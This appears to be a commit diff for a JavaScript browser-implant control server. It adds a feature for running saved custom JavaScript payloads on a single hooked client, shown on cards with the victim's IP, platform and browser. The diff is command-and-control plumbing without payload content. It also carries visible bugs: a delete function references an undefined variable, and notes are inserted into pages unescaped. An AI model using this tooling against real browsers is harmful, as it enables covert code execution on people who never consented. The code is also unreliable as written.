Single client payload execution initial check in. Mostly works, still…

… bugs. UI tweaks for client view. Updated library with security bug.

index.html

@@ -16,7 +16,7 @@
  }
 
  .input-width {
- width: 50%;
+ width: 50%;
  }
 
  body {
@@ -470,26 +470,26 @@ <h5 class="modal-title" id="custom-payload-title">Custom JavaScript Payloads</h5
  <div> 
  <p class="description">&nbsp;&nbsp;&nbsp;&nbsp;Custom JavaScript payloads can be entered in this tool and executed on clients.</p>
  </div>
- 
-  <!-- List of Saved Payloads -->
-  <div class="modal-body">
-  <h6>Saved Payloads (select to load for editing):</h6>
-  <ul id="savedPayloadsList" class="list-group">
-  </ul>
-  </div>
- 
+
+  <!-- List of Saved Payloads -->
+  <div class="modal-body">
+  <h6>Saved Payloads (select to load for editing):</h6>
+  <ul id="savedPayloadsList" class="list-group">
+  </ul>
+  </div>
+
  <div class="modal-footer">
-  <div class="ms-0">
-   <button id="payload-import-button" class="btn btn-secondary me-2" data-toggle="tooltip" title="Import Custom Payloads">Import</button>
-   <!-- input for importing -->
-   <input type="file" id="importInput" accept=".json" style="display: none;">
- 
-  <button id="payload-export-button" class="btn btn-secondary me-4"data-toggle="tooltip" title="Export Custom Payloads">Export</button>
+  <div class="ms-0">
+  <button id="payload-import-button" class="btn btn-secondary me-2" data-toggle="tooltip" title="Import Custom Payloads">Import</button>
+  <!-- input for importing -->
+  <input type="file" id="importInput" accept=".json" style="display: none;">
+
+  <button id="payload-export-button" class="btn btn-secondary me-4"data-toggle="tooltip" title="Export Custom Payloads">Export</button>
  <!-- Hidden anchor element for exporting -->
  <a id="exportLink" style="display: none;"></a>
- 
-  <button id="payload-editor-button" class="btn btn-secondary">Show Editor</button>
-  </div>
+
+  <button id="payload-editor-button" class="btn btn-secondary">Show Editor</button>
+  </div>
  <div class="ms-auto">
  <button id="payload-save-button" class="btn btn-primary me-2">Save</button>
  <button id="payload-close-button"type="button" class="btn btn-secondary">Close</button>
@@ -499,17 +499,17 @@ <h6>Saved Payloads (select to load for editing):</h6>
 
  <div id="payloadEditor">
  <div class="modal-body">
-   <label for="payloadName" class="form-label">Payload Name:</label>
-   <input type="text" class="form-control input-width" id="payloadName" name="name" required>
+   <label for="payloadName" class="form-label">Payload Name:</label>
+   <input type="text" class="form-control input-width" id="payloadName" name="name" required>
  </div>
 
  <div class="modal-body">
-   <label for="payloadDescription" class="form-label">Payload Description/Instructions:</label>
-   <textarea id="payloadDescription" class="form-control" rows="2"></textarea>
+   <label for="payloadDescription" class="form-label">Payload Description/Instructions:</label>
+   <textarea id="payloadDescription" class="form-control" rows="2"></textarea>
  </div>
 
  <div class="modal-body">
-   <label for="payload-editor" class="form-label">JavaScript Code:</label>
+   <label for="payload-editor" class="form-label">JavaScript Code:</label>
  <textarea id="payload-editor" class="form-control" rows="10"></textarea>
  </div>
 
@@ -520,6 +520,36 @@ <h6>Saved Payloads (select to load for editing):</h6>
  </div>
 
 
+
+ <!-- Custom Payload Modal - Single Client -->
+ <div id="singleClientPayloadModal" class="modal fade modal-md" tabindex="-1" aria-hidden="true">
+ <div class="modal-dialog">
+ <div class="modal-content">
+ <div class="modal-header">
+ <h5 class="modal-title" id="single-client-payload-title">Custom JavaScript Payloads</h5>
+ <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
+ </div>
+ <div> 
+ <p class="description">&nbsp;&nbsp;&nbsp;&nbsp;Payloads can be run on this client.</p>
+ </div>
+
+ <!-- List of Saved Payloads -->
+ <div class="modal-body">
+ <h6>Saved Payloads:</h6>
+ <ul id="singleClientPayloadList" class="list-group">
+ </ul>
+ </div>
+
+ <div class="modal-footer">
+ <div class="ms-auto">
+ <button id="payload-close-button"type="button" data-bs-dismiss="modal" class="btn btn-secondary">Close</button>
+ </div>
+ </div>
+ </div>
+ </div>
+ </div>
+
+
  </div>
 </body>
 </html>

jsTapServer.py

@@ -1666,6 +1666,30 @@ def runPayloadAllClients(key):
  return "ok", 200
 
 
+
+
+
+@app.route('/api/runPayloadSingleClient', methods=['POST'])
+@login_required
+def runPayloadSingleClient():
+ content = request.json 
+
+ payloadKey = content['payloadKey']
+ clientKey = content['clientKey']
+
+ payload = CustomPayload.query.filter_by(id=payloadKey).first()
+
+ newJob = ClientPayloadJob(clientKey=clientKey, code=payload.code)
+ db.session.add(newJob)
+ dbCommit()
+
+ return "ok", 200
+
+
+
+
+
+
 @app.route('/api/savePayload', methods=['POST'])
 @login_required
 def saveCustomPayload():

protectedStatic/main.js

@@ -216,7 +216,7 @@ function importPayloads(event)
  reader.onload = function(event)
  {
  const fileContent = event.target.result;
- 
+
  try 
  {
  const jsonData = JSON.parse(fileContent);
@@ -352,13 +352,98 @@ async function runPayloadAllClient(button)
 
 
 
-async function deletePayload(event, payload)
+
+async function runPayloadSingleClient(button, modal)
+{
+ var payloadId = button.id;
+ var clientId = button.client;
+
+ fetch('/api/runPayloadSingleClient', {
+ method:"POST",
+ body: JSON.stringify({
+ payloadKey: payloadId,
+ clientKey: clientId
+ }),
+ headers: {
+ "Content-type": "application/json; charset=UTF-8"
+ }
+ });
+
+ button.style.borderWidth = '2px';
+ button.style.borderColor = 'green';
+
+ setTimeout(function()
+ {
+ button.style.borderWidth = '';
+ button.style.borderColor = '';
+ modal.hide();
+ }, 750);
+}
+
+
+
+function showSingleClientPayloadModal(event, client)
+{
+ var modal = new bootstrap.Modal(document.getElementById('singleClientPayloadModal'));
+ var savedPayloadsList = document.getElementById('singleClientPayloadList');
+
+ refreshSingleClientPayloadList(client, modal);
+ modal.show();
+ // Block resetting of loot card stack
+ event.stopPropagation();
+}
+
+
+
+async function deletePayload(button)
 {
  await fetch('/api/deletePayload/' + payload.id);
  refreshSavedPayloadList();
 }
 
 
+async function refreshSingleClientPayloadList(client, modal)
+{
+ var savedPayloadsList = document.getElementById('singleClientPayloadList');
+
+ savedPayloadsList.innerHTML = '';
+
+ // Let's get our saved payloads from the database
+ var req = await fetch('/api/getSavedPayloads');
+ var jsonResponse = await req.json();
+
+ for (let i = 0; i < jsonResponse.length; i++)
+ {
+ id = jsonResponse[i].id;
+ name = jsonResponse[i].name;
+
+ var payload = document.createElement('li');
+ payload.className = 'list-group-item d-flex justify-content-between align-items-center';
+ payload.textContent = name;
+ payload.name = name;
+ payload.id = id;
+
+ var executePayloadButton = document.createElement('button');
+ executePayloadButton.id = id;
+ executePayloadButton.client = client;
+ executePayloadButton.className = 'btn btn-sm me-2';
+ executePayloadButton.textContent = 'Run Payload';
+ executePayloadButton.setAttribute('data-toggle', 'tooltip');
+ executePayloadButton.setAttribute('title', 'Run Payload on this Client');
+
+
+ executePayloadButton.addEventListener('click', function()
+ {
+ // Run on this clients
+ runPayloadSingleClient(this, modal);
+ })
+
+ payload.appendChild(executePayloadButton);
+ savedPayloadsList.appendChild(payload);
+ }
+}
+
+
 
 
 
@@ -1188,25 +1273,31 @@ async function updateClients()
  cardTitle.innerHTML += '<img src="/protectedStatic/star.svg" style="float: right;" onclick="toggleStar(this, event,' + `'` + client.id + `','` + client.nickname + `')">`;
  }
 
+
  cardTitle.innerHTML += '<img src="/protectedStatic/x-circle.svg" style="float: right; margin-right: 10px;" onclick="blockClient(this, event,' + `'` + client.id + `','` + client.nickname + `')">`;
  cardTitle.innerHTML += '&nbsp;&nbsp;&nbsp';
 
- cardText.innerHTML = "IP:<b>&nbsp;&nbsp;&nbsp;" + client.ip + "</b><br>";
+ cardText.innerHTML = "IP:<b>&nbsp;&nbsp;&nbsp;" + client.ip + "</b>";
+
  //What to do about client notes?
  if (client.notes.length > 0)
  {
- cardText.innerHTML += '<button type="button" class="btn btn-primary" style="float: right;" onclick=showNoteEditor(event,' + `'` 
+ cardText.innerHTML += '<button type="button" class="btn btn-primary btn-sm" style="float: right;" onclick=showNoteEditor(event,' + `'` 
  + client.id + `','` + client.nickname + `','` + client.notes + `'`+ ')>Edit Notes</button>';
  }
  else
  {
- cardText.innerHTML += '<button type="button" class="btn btn-primary" style="float: right;" onclick=showNoteEditor(event,' + `'` 
+ cardText.innerHTML += '<button type="button" class="btn btn-primary btn-sm" style="float: right;" onclick=showNoteEditor(event,' + `'` 
  + client.id + `','` + client.nickname + `','` + client.notes + `'`+ ')>Add Notes</button>';
  }
 
- cardText.innerHTML += "Platform:<b>&nbsp;&nbsp;&nbsp;" + client.platform + "</b><br>";
+ cardText.innerHTML += "<br>Platform:<b>&nbsp;&nbsp;&nbsp;" + client.platform + "</b><br>";
  cardText.innerHTML += "Browser:<b>&nbsp;&nbsp;&nbsp;" + client.browser + "</b>";
 
+ cardText.innerHTML += '<button type="button" class="btn btn-primary btn-sm" style="float: right;" onclick=showSingleClientPayloadModal(event,' + `'` 
+ + client.id + `'`+ ')>Run Payload</button>';
+
+
  cardSubtitle.innerHTML = "First Seen: " + humanized_time_span(client.firstSeen) + "&nbsp;&nbsp;&nbsp;";
  cardSubtitle.innerHTML += "Last Seen: <b>" + humanized_time_span(client.lastSeen) + "</b>";